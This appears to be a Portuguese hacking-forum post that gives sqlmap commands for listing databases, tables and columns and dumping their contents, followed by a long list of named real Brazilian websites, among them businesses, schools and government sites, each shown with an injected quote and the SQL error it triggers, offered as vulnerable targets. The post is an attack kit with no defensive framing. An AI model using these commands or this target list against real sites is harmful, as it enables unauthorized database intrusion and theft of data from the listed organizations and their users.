Tweet
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (OBS: So Salva Com .PY)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (OBS: So Salva Com .PY)
Código PHP:
Comandos Utilizados
/pentest/database/sqlmap
python sqlmap.py -u site com a falha --dbs
python sqlmap.py -u site com a falha -D nomedb --tables
python sqlmap.py -u site com a falha -D nomedb -T nometabela --columns
python sqlmap.py -u site com a falha -D nomedb -T nometabela -C nomecoluna --dump
Código PHP:
Lista De Sites Vulneraveis
http://www.microbiotecnica.com.br/ver_galeria.php?id=1' |error in your SQL syntax|
http://www.personalrecursoshumanos.com.br/ver_galeria.php?id=353' |error in your SQL syntax|
http://www.planttec.com.br/galeria.php?idAlbum=7' |mysql_fetch_array()|
http://www.renatoaguiar.com.br/fotos-galeria.php?id=13' |mysql_fetch_array()|
http://www.silvinhosbar.com.br/galeria.php?id_galeria=159' |mysql_fetch_array()|
http://www.tanamidianavirai.com.br/galeria.php?id_evento=501' |mysql_fetch_array()|
http://www.woodfort.com.br/ver_galeria.php?id_galeria=11' |FetchRow()|
http://www.zodiacobar.com.br/galeria.php?id=22' |error in your SQL syntax|
http://bragancaimoveis.com.br/fotos.php?id_casa=1043' |mysql_fetch_array()|
http://www.anecake.com.br/fotos.php?id=1' |mysql_fetch_array()|
http://www.baladasdailha.com.br/eventos_popup_fotos.php?id=2181' |mysql_fetch_array()|
http://www.bizibiu.com.br/fotos.php?id=24' |error in your SQL syntax|
http://www.caslocacoes.com.br/Fotos.php?id=1'&id2=1' |error in your SQL syntax|
http://www.dvicogesso.com.br/fotos.php?id=6' |error in your SQL syntax|
http://www.eldoradofestas.com.br/ver_fotos.php?id=67' |mysql_fetch_array()|
http://www.esmeralda.rs.gov.br/fotos.php?id_album=9' |mysql_fetch_array()|
http://www.kadyestofados.com.br/fotos.php?id=95' |mysql_fetch_array()|
http://www.m3arquitetura.com.br/fotos.php?id=6%20'&%20foto=556' |error in your SQL syntax|
http://www.magicgardens.com.br/fotos.php?id=198' |mysql_fetch_array()|
http://www.pirigulinobabilake.com.br/fotos.php?id=7' |FetchRow()|
http://www.rondonoticias.com.br/fotos.php?id=26' |mysql_fetch_object()|
http://www.tocar.com.br/fotos.php?id=166'&foto_amp=1' |mysql_fetch_object()|
http://proaudiobh.com.br/servico.php?idservico=20' |error in your SQL syntax|
http://veterinariakamura.com.br/ver_servico.php?id=271' |mysql_fetch_array()|
http://www.agmgeotecnica.com.br/servico.php?id=6' |error in your SQL syntax|
http://www.cadastropositivo.com.br/index.php?caminho=servico.php'&id=2' |include()|
http://www.colegioprisma.g12.br/servico.php?id=1' |mysql_fetch_assoc()|
http://www.kcw.com.br/ver_servico.php?id=25' |mysql_fetch_array()|
http://www.scepp.com.br/ver_servico.php?id_categoria=1' |mysql_fetch_array()|
http://www.ser-tel.com.br/site/servico.php?id=14' |error in your SQL syntax|
http://www.soscozinha.com.br/ver_servico.php?id=12' |mysql_num_rows()|
http://www.therj.com.br/site/servico.php?id=1' |mysql_num_rows()|
http://www.veterinariakamura.com.br/ver_servico.php?id=256' |mysql_fetch_array()|
http://www.vitoriahumanarh.com.br/servico.php?id=38' |error in your SQL syntax|
http://www.evanivaldojr.com.br/subtop.php?id=24'
http://www.musiteki.com.br/prod_show.php?id=1140' |mysql_num_rows()|
http://www.rhportal.com.br/eventos/show.php?id=dwtocgpg' |error in your SQL syntax|
http://www.teckprint.com.br/show.php?id=53' |error in your SQL syntax|
http://www.abcjpega.com.br/exposicao_evento.php?id=25' |mysql_fetch_array()|
http://www.belasantacatarina.com.br/eventos.asp?ev=4562'&cid=52' |ADODB.Command|
http://www.cvi.com.br/mc_evento.php?id=5' |error in your SQL syntax|
http://www.faculdademental.com.br/formanFormados2.php?not_id=0002378' |error in your SQL syntax|
http://www.iosa.com.br/evento.php?id=71' |error in your SQL syntax|
http://www.m9producoes.com.br/producoes/evento.php?id=22' |mysql_fetch_assoc()|
http://www.pensamentoearte.com.br/evento.php?id=35' |FetchRow()|
http://www.anatereza.com.br/chocolates_categoria.php?id=18' |mysql_fetch_array()|
http://www.bellajoias.com.br/categoria.php?id=4' |error in your SQL syntax|
http://www.coferpol.com.br/categoria.php?id=2' |mysql_fetch_array()|
http://www.cpdmoveis.com.br/dados_categoria.php?id_linha=8' |mysql_num_rows()|
http://www.expak.com.br/categoria.php?id=1' |error in your SQL syntax|
http://www.fase.org.br/v2/categoria.php?id=21' |Syntax error|
http://www.fotoratts.com.br/categoria.php?id='&idg='&p=4'&p=4'&cat=Book'&' |mysql_fetch_array()|
http://www.karinfotografias.com.br/categoria.php?id=4' |error in your SQL syntax|
http://www.mestreguido.com.br/busca_categoria.php?id_categoria=012' |mysql_fetch_array()|
http://www.multiespaco.com.br/categoria.php?id=29' |mysql_fetch_array()|
http://www.nutriservice.com.br/categoria.php?id=0'&marca=nestle'&pg=2' |error in your SQL syntax|
http://www.oclick.com.br/categoria.php?id=11' |mysql_fetch_array()|
http://www.quimifix.com.br/produtos_categoria.php?id=5' |mysql_fetch_array()|
http://www.tezukuri.com.br/produtos_categoria.php?id=19' |error in your SQL syntax|
http://www.vipreview.com.br/categoria.php?id_categoria=6' |error in your SQL syntax|
http://cemporcentoskate.uol.com.br/revista.php?id=3777' |Server Error in '/' Application|
http://sexsites.uol.com.br/revista.php?id=103'&gordinhas' |error in your SQL syntax|
http://www.dellar.com.br/casa.php?id=16' |error in your SQL syntax|
http://www.esteio.com.br/index.php?pagina=empresa/organograma/cons_admin.php'&id_page=283,284' |mysql_fetch_object()|
http://museudaliturgia.com.br/museu/igreja.php?id=7' |mysql_fetch_array()|
http://www.igrejaitatiaia.com.br/igreja/aigreja.php?id=101' |include()|
http://tebol.com.br/cidade/home.php?id=2527' |error in your SQL syntax|
http://www.eventtour.com.br/index_home.php?id=288' |mysql_fetch_row()|
http://www.ispiaki.com.br/fone/home.php?id=buscar' |mysql_fetch_array()|
http://www.ispiaki.com.br/fone/home.php?id=buscar' |mysql_num_rows()|
http://www.moviecom.com.br/m/home.php?id=JUN' |mysql_fetch_array()|
http://www.newtrade.com.br/editoriais_home.php?id=11' |error in your SQL syntax|
http://www.sbpcnet.org.br/site/home/home.php?id=1109' |error in your SQL syntax|
http://cineweb.com.br/filmes/filme.php?id_filme=10' |error in your SQL syntax|
http://m.boulevardcampos.com.br/detalhes_filme.php?id_filme=385' |mysql_fetch_array()|
http://moviecom.com.br/filme.php?idfilme=59974'&id=NAT' |mysql_fetch_array()|
http://www.moviecom.com.br/filme.php?idfilme=59736'&id=SBO' |mysql_fetch_array()|
http://autocenterspneus.com.br/autocenter_lojas_revenda.php?id=1422'&revenda=DPaschoal%20%20(Goodyear)'&cidade=Joinville%20Santa%20Catarina' |mysql_fetch_array()|
http://www.autocenterspneus.com.br/autocenter_lojas_revenda.php?id=1806'&revenda=GRIFFE%20PNEUS'&cidade=Bras%EDlia%20Distrito%20Federal' |mysql_fetch_array()|
http://www.autoshoppingpraiagrande.com.br/sistema/revenda.php?idRevenda=10' |error in your SQL syntax|
http://www.familarimoveis.com.br/imoveis/resultado_venda.php?id_tipo_imovel=0'&codigo2='&id_cidade=0'&quartos='&id_bairro=0'&ate2='&de=' |error in your SQL syntax|
http://www.gobirefrigeracao.com.br/revenda.php?id_secao=4' |error in your SQL syntax|
http://www.hoteldoscarros.com.br/revenda.php?id=18' |error in your SQL syntax|
http://www.raposotavaresimoveis.com.br/imoveis_chacaras_casa_campo.php?ctg_id=2' |error in your SQL syntax|
http://www.symetrya.com.br/venda.php?id=10' |mysql_fetch_array()|
http://www.vpdengenharia.com.br/venda.php?id_imovel=1' |mysql_fetch_array()|
http://www.autoviachevrolet.com.br/chevrolet-exibir-carro.php?id=256' |mysql_fetch_assoc()|
http://www.brazmotors.com.br/exibir-carro.php?id=810' |mysql_fetch_assoc()|
http://www.distacveiculos.com.br/seminovos_carro.php?id=2749' |Syntax error|
http://www.myrodas.com.br/carro.php?id=1053' |mysql_fetch_array()|
http://www.viabrasilautos.com.br/exibeCarro.php?id=1074' |mysql_fetch_array()|
http://www.akiramotos.com.br/consorcio.php?id=149'&pesquisa=1' |Syntax error|
http://www.alvoradamotos.com.br/consorcio.php?id='&pesquisa=1' |Syntax error|
http://www.apeumotos.com.br/consorcio.php?id=158'&pesquisa=1' |Syntax error|
http://www.aramoto.com.br/consorcio.php?id=102'&pesquisa=1' |Syntax error|
http://www.asamotocenter.com.br/consorcio.php?id='&pesquisa=1' |Syntax error|
http://www.bicudomotoshonda.com.br/consorcio.php?id='&pesquisa=1' |Syntax error|
http://www.casacruzeirohonda.com.br/consorcio.php?id=102'&pesquisa=1' |Syntax error|
http://www.dorvalinomotos.com.br/consorcio.php?id=174'&pesquisa=1' |Syntax error|
http://www.duasrodasmotos.com.br/consorcio.php?id=158'&pesquisa=1' |Syntax error|
http://www.fortmotos.com.br/consorcio.php?id=149'&pesquisa=1' |Syntax error|
http://www.graunamotos.com.br/consorcio.php?id=176'&pesquisa=1' |Syntax error|
http://www.hidomotos.com.br/consorcio.php?id=144'&pesquisa=1' |Syntax error|
http://www.hiurimotos.com.br/consorcio.php?id=22'&pesquisa=1' |Syntax error|
http://www.hondamotoway.com.br/consorcio.php?id=158'&pesquisa=1' |Syntax error|
http://www.independenciamotos.com.br/consorcio.php?id=178'&pesquisa=1' |Syntax error|
http://www.itabaianamotos.com.br/consorcio.php?id=153'&pesquisa=1' |Syntax error|
http://www.japauto.com.br/consorcio.php?id=158'&pesquisa=1' |Syntax error|
http://www.monteleonemotos.com.br/consorcio.php?id=158'&pesquisa=1' |Syntax error|
http://www.mothonda.com.br/consorcio.php?id=174'&pesquisa=1' |Syntax error|
http://www.motoaireshonda.com.br/consorcio.php?id=143'&pesquisa=1' |Syntax error|
http://www.motoca.com.br/consorcio.php?id=158'&pesquisa=1' |Syntax error|
http://www.motocentereverest.com.br/consorcio.php?id=158'&pesquisa=1' |Syntax error|
http://www.motoestemotos.com.br/consorcio.php?id=149'&pesquisa=1' |Syntax error|
http://www.motogol.com.br/consorcio.php?id=143'&pesquisa=1' |include()|
http://www.motoguia.com.br/consorcio.php?id=158'&pesquisa=1' |Syntax error|
http://www.motolitoral.com.br/consorcio.php?id=199'&pesquisa=1' |Syntax error|
http://www.motonanuque.com.br/consorcio.php?id=153'&pesquisa=1' |Syntax error|
http://www.motopema.com.br/consorcio.php?id=176'&pesquisa=1' |Syntax error|
http://www.motoscala.com.br/consorcio.php?id=149'&pesquisa=1' |Syntax error|
http://www.motoscarton.com.br/consorcio.php?id=204'&pesquisa=1' |Syntax error|
http://www.motostar.com.br/consorcio.php?id=202'&pesquisa=1' |Syntax error|
http://www.motozan.com.br/consorcio.php?id=158'&pesquisa=1' |Syntax error|
http://www.naramotos.com.br/consorcio.php?id=223'&pesquisa=1' |Syntax error|
http://www.nortmotos.com.br/consorcio.php?id=172'&pesquisa=1' |Syntax error|
http://www.pernambucomotos.com.br/consorcio.php?id=153'&pesquisa=1' |Syntax error|
http://www.prolinkveiculos.com.br/consorcio.php?id=143'&pesquisa=1' |Syntax error|
http://www.rafamoto.com.br/consorcio.php?id=176'&pesquisa=1' |Syntax error|
http://www.strmotos.com.br/consorcio.php?id=158'&pesquisa=1' |Syntax error|
http://www.wanmotos.com.br/consorcio.php?id=143'&pesquisa=1' |Syntax error|
http://www.tamoyo.com.br/pacotesVisualiza.php?id=24'
http://www.sipces.org.br/leis.php?id=10'
http://dullius.com.br/site/loja.php?id=10' |mysql_fetch_assoc()|
http://www.asipanema.com.br/lista_loja.php?id=12316' |error in your SQL syntax|
http://www.ezioflores.com.br/loja.php?idCategoria=16' |mysql_num_rows()|
http://www.negociecarrosrs.com.br/loja.php?id=1155' |mysql_fetch_array()|
http://www.omegasorocaba.com.br/index_loja.php?id_lj=13'&id_loja_admycar=306' |mysql_fetch_array()|
http://www.pilatesbrasil.com.br/loja.php?id_conteudo=28' |error in your SQL syntax|
http://www.shoppingpiracicaba.com.br/lojas/exibe_loja.php?id=136' |mysql_fetch_array()|
http://www.supercei.com.br/loja.php?id=18' |mysql_fetch_array()|
http://www.supervisaoimoveis.com.br/loja.php?id=2' |error in your SQL syntax|
http://www.titico.com.br/loja.php?id_cat=1'&id=5' |error in your SQL syntax|
http://fepese.ufsc.br/veroportunidade.php?id_oportunidade=8227' |error in your SQL syntax|
http://www.fepese.org.br/veroportunidade.php?id_oportunidade=8582' |error in your SQL syntax|
http://www.mafex.com.br/oportunidade.php?id=44' |mysql_fetch_object()|
http://endividado.com.br/faq_lista.php?id=8' |error in your SQL syntax|
http://jogrampo.com.br/produto_lista.php?idcategoria=4'&idfornecedor=14' |error in your SQL syntax|
http://meusite.neoclic.com.br/kampai/galeria/lista.php?id=3'&pagina=2'&pagina=3' |FetchRow()|
http://www.adec.org.br/artigo_lista.php?id=1' |error in your SQL syntax|
http://www.aliancapelainfancia.org.br/artigos_lista.php?id_area=5' |mysql_fetch_array()|
http://www.econegocios.com.br/ecoprodutoslista.php?id=62' |error in your SQL syntax|
http://www.editorabiruta.com.br/lista.php?id=10' |mysql_fetch_array()|
http://www.empresasdeonibus.com.br/noticias_lista.php?id=73' |mysql_fetch_object()|
http://www.endividado.com.br/faq_lista.php?id=1' |error in your SQL syntax|
http://www.mariazeli.com.br/galeria_lista.php?id_sub=15' |mysql_fetch_row()|
http://www.shopset.com.br/lista.php?id_subcategoria=35' |mysql_fetch_array()|
http://www.susibellini.com.br/studio-lista.php?id=27' |mysql_num_rows()|
http://pieron.com.br/cursos_geral.php?id=da' |mysql_fetch_array()|
http://prodocbeta.museudoindio.gov.br/povosindigenas.conhecerparavalorizar/geral.php?ID_S=22' |mysql_fetch_array()|
http://www.almeidapaiva.adv.br/novo/template_geral.php?id=176' |mysql_fetch_array()|
http://www.animalenatureza.org.br/noticias_geral.php?id_materia=195' |mysql_num_rows()|
http://www.casaruibarbosa.gov.br/geral.php?ID_S=159' |mysql_fetch_array()|
http://www.ccolhos.com.br/index2.php?ver=geral.php'&id_menu_press=12' |include()|
http://www.centrocelsofurtado.org.br/geral.php?ID_S=64' |mysql_fetch_array()|
http://www.pieron.com.br/cursos_geral.php?id=burnout' |mysql_fetch_array()|
http://www.unimedbarramansa.com.br/ora/noticias_geral.php?id=146' |mysql_fetch_array()|
http://casadachris.uol.com.br/casamento_materia.php?id=111' |mysql_fetch_array()|
http://grupoandreluiz.org.br/ler_materia.php?id=93' |mysql_fetch_array()|
http://www.anpcont.com.br/site/materia.php?id=32' |mysql_fetch_array()|
http://www.chasquepampeano.com.br/materia.php?id=134' |error in your SQL syntax|
http://www.editoraideal.com.br/ler_materia.php?id=100' |mysql_fetch_array()|
http://www.grupoandreluiz.org.br/ler_materia.php?id=106' |mysql_fetch_array()|
http://www.jornaldaqui.com.br/materia.php?id_artigo=4796'&id_categoria=28' |mysql_fetch_array()|
http://www.revistaopinioes.com.br/aa/materia.php?id=177' |mysql_fetch_assoc()|
http://www.vipreview.com.br/materia.php?id=355' |error in your SQL syntax|
http://contadez.cenofisco.com.br/legislacao.php?id=100281' |mysql_fetch_object()|
http://proaudiobh.com.br/legislacao.php?idlegislacao=35' |error in your SQL syntax|
http://www.agptea.org.br/viewLegislacao.php?idLegis=5' |error in your SQL syntax|
http://www.cge.go.gov.br/site/legislacao.php?idcat=00002'&sub_categoria=00003' |error in your SQL syntax|
http://www.controleinterno.goias.gov.br/site/legislacao.php?idcat=00002'&sub_categoria=00004' |error in your SQL syntax|
http://www.proaudiobh.com.br/legislacao.php?idlegislacao=1' |error in your SQL syntax|
Comment